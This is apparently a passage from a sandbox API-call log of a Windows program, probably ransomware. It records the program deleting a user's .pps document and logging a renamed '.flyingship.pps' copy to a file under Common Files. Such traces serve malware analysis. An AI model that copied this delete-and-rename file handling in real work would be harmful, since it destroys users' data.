lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.200] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.201] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\hvt5kt0pfopfwsd qzn.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0178.201] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.201] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.201] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.201] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.201] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0178.201] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.201] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.201] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.203] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.203] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.203] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.203] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.203] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.203] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0178.203] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.203] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.203] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.204] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.204] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.204] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.204] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.204] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps", lpFilePart=0x0) returned 0x4f [0178.205] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a0ad840, ftCreationTime.dwHighDateTime=0x1d5e7b0, ftLastAccessTime.dwLowDateTime=0x96ac91b0, ftLastAccessTime.dwHighDateTime=0x1d5dda2, ftLastWriteTime.dwLowDateTime=0xf8afdc0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x9f51, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="hvT5kT0PFopfwSD QzN.pps", cAlternateFileName="HVT5KT~1.PPS")) returned 0x90af58 [0178.205] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\hvt5kt0pfopfwsd qzn.pps")) returned 1 [0178.207] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a0ad840, ftCreationTime.dwHighDateTime=0x1d5e7b0, ftLastAccessTime.dwLowDateTime=0x96ac91b0, ftLastAccessTime.dwHighDateTime=0x1d5dda2, ftLastWriteTime.dwLowDateTime=0xf8afdc0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x9f51, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="hvT5kT0PFopfwSD QzN.pps", cAlternateFileName="HVT5KT~1.PPS")) returned 0 [0178.207] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0178.208] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.208] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.208] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0178.208] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0178.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0178.208] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0178.208] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0178.208] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0178.209] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0178.209] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0178.210] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.210] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0178.210] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.210] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0178.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0178.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0178.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0178.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0178.211] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0178.211] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x1844, lpOverlapped=0x0) returned 1 [0178.211] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0178.211] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x1844, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.211] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0178.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0178.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0178.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0178.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.flyingship.pps\r\n", cchWideChar=93, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0178.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5d) returned 0x9a5d10 [0178.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.flyingship.pps\r\n", cchWideChar=93, lpMultiByteStr=0x9a5d10, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.flyingship.pps\r\n", lpUsedDefaultChar=0x0) returned 93 [0178.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0178.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0178.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0178.211] WriteFile (in: hFile=0x120, lpBuffer=0x9a5d78*, nNumberOfBytesToWrite=0x5c, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d78*, lpNumberOfBytesWritten=0x87f43c*=0x5c, lpOverlapped=0x0) returned 1 [0178.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0178.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.212] CloseHandle (hObject=0x120) returned 1 [0178.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0178.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0178.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0178.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0178.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0178.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0178.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0178.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0178.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0178.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0178.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0178.216] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0178.216] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0178.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0178.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0178.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0178.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0178.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0178.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0178.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0178.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0178.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0178.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0178.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0178.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0178.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0178.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0178.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0178.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0178.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0178.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0178.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0178.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0178.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0178.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0178.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0178.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0178.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0178.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0178.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0178.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0178.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0178.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0178.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0178.217] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0178.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0178.217] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0178.217] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0178.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0178.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0178.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0178.218] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0178.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0178.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0178.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0178.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0178.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0178.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0178.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0178.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0178.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0178.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0178.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fa0 [0178.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0178.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0178.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0178.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0178.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0178.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0178.219] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0178.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0178.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0178.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0178.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0178.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0178.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0178.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0178.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0178.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0178.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0178.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0178.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0178.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0178.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0178.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0178.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0178.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0178.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0178.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0178.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0178.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 